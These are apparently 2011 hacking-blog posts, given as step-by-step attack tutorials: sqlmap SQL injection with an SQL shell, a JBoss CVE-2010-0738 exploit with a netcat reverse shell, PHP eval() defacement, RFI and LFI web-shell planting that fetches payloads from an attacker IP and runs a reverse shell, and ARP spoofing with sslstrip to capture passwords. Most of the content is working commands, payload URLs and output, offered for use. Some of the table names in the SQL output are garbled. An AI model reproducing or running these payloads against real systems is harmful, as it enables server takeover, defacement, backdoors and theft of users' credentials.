Saturday 12 March 2011

How to do sql injections with SQLMAP

Hi everyone, today I will explain how to use a tool called sqlmap, this tool make your life easier , instead guessing the correct url to get the information that you need from the server with weird and complex combinations. There is a website that acunetix made available for sql tests : http://testphp.vulnweb.com/

So, I know that there is a problem in this URL http://testphp.vulnweb.com/listproducts.php?cat=1 because if you type http://testphp.vulnweb.com/listproducts.php?cat=' , you get a msql error :

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/default/htdocs/listproducts.php on line 74


Now if you want to know how many fields this table has, you have to type this
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 2--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 3--
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 4--
and so on until you get another error, in this case, is 11, so you know that there is 11 fields on this table because if you put order by 12 you get an error.
Ok, now if want to know the user that is running this database I would type :
http://testphp.vulnweb.com/listproducts.php?cat=1 UNION SELECT ALL 1,USER(),3,4,5,6,7,8,9,10,11--
Or the database name..
http://testphp.vulnweb.com/listproducts.php?cat=1 UNION SELECT ALL 1,DATABASE(),3,4,5,6,7,8,9,10,11--
Check the botton of the page for the results.


Pretty boring and time consuming heim? Lets make this easier with sqlmap.
You can download sqlmap or use the one that is in backtrack : root@bt:/pentest/database/sqlmap/
Open the sqlmap.conf and put the vuln url in the url field, it should look like this :
url = http://testphp.vulnweb.com/listproducts.php?cat=1
save it and now lets run some tests.

1) sqlmap -h ( look all the different things you can do)
2) lets open a sql shell on the remote server with this command : ./sqlmap.py -c sqlmap.conf --sql-shell
Now you are on a shell, you can type any sql query, here are some examples in my sql shell:

web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[21:28:02] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> version()
do you want to retrieve the SQL statement output? [Y/n] y
[21:28:55] [INFO] fetching SQL query output: 'version()'
[21:28:55] [INFO] retrieved: 5.0.22-Debian_0ubuntu6.06.6-log
version(): '5.0.22-Debian_0ubuntu6.06.6-log'

sql-shell> user()
do you want to retrieve the SQL statement output? [Y/n] y
[21:29:39] [INFO] fetching SQL query output: 'user()'
[21:29:39] [INFO] retrieved: acuart@localhost
user(): 'acuart@localhost'

################
Now lets lists all databases and tables with the command : ./sqlmap.py -c sqlmap.conf --tables
And this is the result :
Database: acuart
[7 tables]
+---------------------------------------+
| aaars |
| aaastbes |
| aaastbook |
| aaatured |
| aarts |
| aateg |
| artists |
+---------------------------------------+

Database: modrewriteShop
[1 table]
+---------------------------------------+
| products |
+---------------------------------------+

Database: information_schema
[16 tables]
+---------------------------------------+
| CABGG |
| CABGGERIVILEGES |
| CABGGERS |
| CABLES |
| CABLE_CONSTRAINTS |
| CABLE_PRIVILEGES |
| CCATISTICS |
| CCHEMATA |
| CCHEMA_PRIVILEGES |
| CEUTINES |
| CEY_COLUMN_USAGE |
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
+---------------------------------------+


Pretty easy don't you think? Well, this is just and introduction on what you can do this sqlmap, have fun!!

Proof of concept on jboss exploit (CVE-2010-0738)



CVE: CVE-2010-0738
Remote: Yes
Local: No
Url about the vuln and  download of the exploit : http://www.securityfocus.com/bid/39710/info


JBoss Enterprise Application Platform is prone to multiple vulnerabilities, including an information-disclosure issue and multiple  authentication-bypass issues. An attacker can exploit these issues to bypass certain security restrictions to obtain sensitive information or gain unauthorized access  to the application.
Ok, now lets rock and roll!
1) Open 2 shell's on your backtrack or your pentest machine
2) In the first one you have to prepare your pentest server to receive the connection back from the target machine, so you have to type in this shell : nc -l -p 8000 -vvv
3) Now, in the other shell run the exploit :  perl jboss.pl mytargettest.com 8080 172.16.1.79 8000 lnx

If you see this in the exploit shell, it means it worked!

UPLOAD... SUCCESS
EXECUTE
SUCCESS


Now go to your other shell and you should have your reverse shell connected!

Have fun.

Saturday 5 March 2011

Deface using EVAL() function



"Eval () is a PHP function that allows to interpret a given string as PHP code, because eval () is often used in Web applications,although interpretation of the chain is widely liked manipulated, eval () serves most of the time to execute php code containing previously defined variable.
The problem is that if eval () executes a variable that you can modify the code contained by php eval () will execute as such. Reminder: eval () allows execution of a given string as PHP code but not write (or if so desired) its content in this page or others, he is content to perform, and display the result."

Ok, this is our the vuln page :

<?php
$Ev = $_GET['ev'];
$eva = stripslashes($Ev);
eval($eva);
?>
Now lets go to the interesting part, to start we need to test if the page is vuln typing this :
http://mytargettest.com/hacktest/index.php?ev=phpinfo();
If you can see the phpinfo webpage, it means we can exploit it.
Now lets see what we can do .
1) You can just deface the index.php using this URL -> http://mytargettest.com/hacktest/index.php?ev=$z=fopen("index.php",'w');fwrite($z,("Defaced by Hacker"));fclose($z);

2) Or you can create your shell with this URL -> http://mytargettest.com/hacktest/index.php?ev=$z=fopen("shell.php",'w');fwrite($z,file_get_contents("http://172.16.1.79/exploits/back.txt"));fclose($z);

3) Browse your shell : http://mytargetest.com/hacktest/shell.php
Now just look at my old posts (LFI or RFI) and you will know what to do from this point ;)

How to exploit RFI (Remote File Include) vulnerability on webpages.



Hi everyone, this post is really similar to the one that I just made ( LFI ), the only difference is that you can include your own code into the remote server more easily.
So, this is our vuln wepage :
http://mytargettest.com/hacktest/rfi.php?COLOR=color.css
BUT instead loading the file color.css, we will be loading our own code to that box like this :

http://mytargettest.com/hacktest/rfi.php?COLOR=http://172.16.1.79/exploits/evil3.txt

The content of evil3.txt is :

<?php $z=fopen('./shell.php','w');fwrite($z,file_get_contents('http://172.16.1.79/exploits/back.txt'));fclose($z); ?>

If you notice the extension of the file is .txt, there is a reason for that, if you put .php, the code will be interpreted by the pentest server instead the target server, don't forget to put .txt in your evil code.
Great, we just uploaded our shell to the server now browse it : http://mytargettest.com/hacktest/shell.php
Now you can just repeat what I did in the LFI post to get your real shell in the server.

Another Tip: Some developers try to include the extension like .css or .php or .any other extension, ok, so how can we avoid that? You just add a NULLBYTE in the end of the URL.

How to exploit LFI (Local File Include) vulnerability on webpages



Hi everyone, today will explain how to exploit LFI with PHP, there is loads of bad developers out there not doing their job properly, so there is plenty fish on the sea for this one :)
Little explanation : "In PHP, include(), require() and similar functions may allow the application developer to include an external PHP script in the running script. If it is possible for the user to control arguments to the include function, it may be possible for a malicious user to direct the vulnerable script to execute arbitrary code on the host server, allowing complete control of PHP execution on the host server.
The proper solution to this vulnerability is to modify the vulnerable code in order to prevent user control of file include directives.
A PHP include vulnerability may be partially mitigated in some cases by using PHP's allow_url_fopen and allow_url_include options in an effort to limit file inclusion to local files, but this may be evaded in some cases (e.g. by including Apache's logfile which may contain arbitrary PHP code)."

Ok, lets go to the interesting part.
This is our vuln test webpage : http://mytargettest.com/hacktest/lfi.php?page=contact.php
Now we can browse files on the remote server using that vuln by adding ../../../
So, if you want to read /etc/passwd , the URL will be http://mytargettest.com/hacktest/lfi.php?page=../../../../../../etc/passwd
Ok, now you wonder how can I exploit this? Well... there is many ways of doing it, my favorite is creating an evil entry in the apache access.log and then we retrieve the file and our evil code will be executed, ok, so now step by step:
0) Make your php_shell available on your pentest machine with the name back.txt , just rename your back_door_shell.php to back.txt, we will fetch this file in our attack, you can find one in your backtrack in
/pentest/backdoors/web/php-backdoor.php

1) Make sure you can access the file access.log, you can browse the server to find it, in my case is in /var/log/httpd/access.log
Browse it just to make sure you can read the file : http://mytargettest.com/hacktest/lfi.php?page=../../../../../../var/log/httpd/access_log

2) telnet mytargettest.com 80
and then type this : GET /<?php $z=fopen('shell.php','w');fwrite($z,file_get_contents('http://172.16.1.79/exploits/back.txt'));fclose($z); ?>  

And hit ENTER 2x.
This will create an entry on access.log , now we need to read the file again and our php evil code will be executed

3) http://mytargettest.com/hacktest/lfi.php?page=../../../../../../var/log/httpd/access_log

4) Ok, now you should have a file create called shell.php

5) Now access your shell http://mytargettest.com/hacktest/shell.php

6) Upload your reverse shell or download it : wget -P /tmp http://172.16.1.79/exploits/airwolf_reverse_shell

7) Make your pentest server ready to recieve the connection from the target machine: nc -l -p 8080 -vvv

8) Give permission to your shell : chmod +x /tmp/airwolf_reverse_shell

9) Execute your reverse shell : /tmp/airwolf_reverse_shell

10) Done, you have real shell access to the server, have fun ;)

If you want to know more ways to exploit this, just post a comment!
Thanks for watching.

Wednesday 2 March 2011

How to sniff passwords or everything typed in a browser client with SSLSTRIP

0) Open a shell in your backtrack.
1) echo 1 > /proc/sys/net/ipv4/ip_forward
2) arpspoof -t eth0 -t 192.168.127.xxx(CLIENT) 192.168.127.1(GW)
3) iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
4) pythton sslstrip.py -w secret

Now, what does each part?
1) Enable the packet forward .
2) Your machine(backtrack) becomes the GW for that unique client, you can also become the gateway for the WHOLE network, just remove the target.
3) Redirect all packets to port 10000
4) Listen on port 10000 and log all the things that the client typed with SSL or without.

Ok, now lets explain what happen in the whole process.
Behind the scene : You fool that specific client to believe that your are his gateway spoofing the ARP table in his machine, now, instead going out via the REAL gateway, all his packets will go out via YOUR machine, in this case, your backtrack. So, you can see everything that the client types in his browser even SSL encripted pages , how? Well, that's the idea, you are stripping the SSL away with sslstrip :)
On the client side: He will not be aware of this, the only thing that will be different in his machine, is when he browses a SSL website like.. https://hotmail.com , instead https it will appear as http://hotmail.com , so if the client don't check if there is a lock in the url address bar..(and they usually don't check that) You will log everything with no problem.
Be aware that some sites don't work without the SSL, so, test it before your try.